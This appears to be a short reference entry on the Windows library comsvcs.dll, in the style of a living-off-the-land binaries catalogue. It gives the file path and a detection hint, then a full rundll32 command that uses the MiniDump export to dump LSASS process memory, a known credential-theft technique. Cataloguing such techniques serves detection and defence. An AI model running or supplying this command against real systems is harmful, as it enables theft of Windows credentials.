COM+ Services

Paths:

c:\windows\system32\comsvcs.dll

Detection: MiniDump being used in library

Dump

Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.

rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"